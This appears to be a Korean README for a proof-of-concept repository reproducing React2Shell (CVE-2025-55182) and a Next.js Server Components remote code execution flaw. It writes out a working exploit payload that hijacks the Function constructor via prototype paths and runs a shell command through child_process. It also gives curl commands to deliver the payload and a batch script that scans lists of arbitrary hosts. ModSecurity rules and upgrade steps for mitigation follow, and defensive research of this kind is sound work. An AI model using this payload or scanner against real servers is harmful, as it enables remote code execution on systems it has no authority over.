
React2Shell(CVE-2025-55182) 및 Next.js RSC RCE(CVE-2025-66478) 취약점을 재현하기 위한 최소 MVP입니다. 익스플로잇 페이로드, 배치 스캐닝 스크립트, 완화를 위한 ModSecurity WAF 규칙이 포함되어 있습니다.
React2Shell (CVE-2025-55182) 및 Next.js RSC RCE (CVE-2025-66478) 취약점을 재현하기 위한 최소 MVP입니다.
이 프로젝트는 보안 연구 및 교육 목적으로만 사용됩니다. 프로덕션 환경이나 승인되지 않은 시스템에서는 사용하지 마십시오.
CVE-2025-55182는 React Server Components의 심각한 취약점으로, 다음에 영향을 미칩니다:
공격자는 특별히 조작된 multipart/form-data 요청을 통해 Flight Protocol의 역직렬화 취약점을 이용하여 원격 코드 실행(RCE)을 달성할 수 있습니다.
$@N 구문을 사용하여 내부 Chunk 객체 획득$1:__proto__:then을 통해 악성 then 메서드 주입_formData.get을 Function 생성자로 하이재킹npm install
# 또는
yarn install
# 또는
pnpm install
npm run dev
서버가 http://localhost:3000에서 시작됩니다.
제공된 테스트 스크립트 사용:
# 단일 대상 테스트
./test-exploit.sh http://localhost:3000
# 또는 curl 직접 사용
curl -X POST http://localhost:3000/ \
-H "Next-Action: x" \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
--data-binary @exploit-payload.txt
취약점이 존재하는 경우, 응답에 uid=와 같은 출력(id 명령어 실행 결과)이 표시됩니다.
.
├── app/
│ ├── actions.ts # Server Actions (취약점 트리거 지점)
│ ├── page.tsx # 메인 페이지
│ ├── layout.tsx # 레이아웃
│ └── globals.css # 전역 스타일
├── package.json # 의존성 설정 (영향받는 버전 사용)
├── next.config.js # Next.js 설정
├── test-exploit.sh # 단일 대상 취약점 테스트 스크립트
├── scan-targets.sh # 일괄 스캔 스크립트
├── exploit-payload.txt # Exploit payload 파일
├── Cve-2025-55182-modsecurity-rules.conf # ModSecurity 보호 규칙
└── README.md # 본 파일
단일 URL에 취약점이 있는지 테스트:
chmod +x test-exploit.sh
./test-exploit.sh http://localhost:3000
특징: 응답에 uid= 또는 gid=가 포함되어 있으면 취약점이 존재하는 것입니다.
여러 대상 URL을 일괄 스캔:
# 대상 목록 파일 생성
cat > targets.txt << EOF
http://localhost:3000
https://example.com
https://api.example.com:8080
EOF
# 일괄 스캔 실행
chmod +x scan-targets.sh
./scan-targets.sh targets.txt
스캔 결과는 vulnerable_hosts.csv에 저장됩니다.
{
"then": "$1:__proto__:then", // then 메서드 하이재킹
"status": "resolved_model", // 실행 경로 제어
"reason": -1,
"value": "{\"then\":\"$B1337\"}", // Blob 역직렬화 트리거
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor" // Function으로 하이재킹
}
}
}
npm install [email protected] [email protected] [email protected]
즉시 업그레이드할 수 없는 경우 ModSecurity 규칙을 배포하여 임시로 완화할 수 있습니다.
# 1. mod_security 설치
sudo apt-get install libapache2-mod-security2
# 2. 규칙 파일 복사
sudo cp modsecurity-rules.conf /etc/modsecurity/
# 3. Apache 설정에 규칙 포함
sudo vim /etc/apache2/mods-enabled/security2.conf
# 추가: Include /etc/modsecurity/modsecurity-rules.conf
# 4. Apache 재시작
sudo systemctl restart apache2
# 1. ModSecurity for Nginx 설치
sudo apt-get install libnginx-mod-security
# 2. 규칙 파일 복사
sudo cp modsecurity-rules.conf /etc/nginx/modsec/
# 3. Nginx 설정에서 활성화
sudo vim /etc/nginx/nginx.conf
# http 또는 server 블록에 추가:
# modsecurity on;
# modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;
# 4. Nginx 재시작
sudo systemctl restart nginx
ModSecurity 규칙은 다음 특징을 차단합니다:
$@N, $BN)__proto__, constructor:constructor)process.mainModule.require, require('child_process'))execSync, exec)_response, _chunks, _formData, _prefix)Next-Action, RSC-Action-ID)⚠️ 참고: WAF 규칙은 임시 완화 조치일 뿐, 완전한 보호를 제공하지 않습니다. 수정된 버전으로의 업그레이드가 필요합니다.
애플리케이션이 영향을 받을 수 있는 경우:
test-exploit.sh 스크립트를 사용하여 애플리케이션 테스트Next-Action 요청 찾기스크립트 없이 curl로 직접 테스트하려면:
curl -X POST http://localhost:3000/ \
-H "Next-Action: x" \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
-H "X-Nextjs-Request-Id: b5dce965" \
--data-binary @exploit-payload.txt
반환 결과에 uid= 또는 gid=가 포함되어 있으면 취약점이 존재하는 것입니다.
이 프로젝트는 교육 목적으로만 사용됩니다. 본 코드 사용 시 관련 법규를 준수하시기 바랍니다.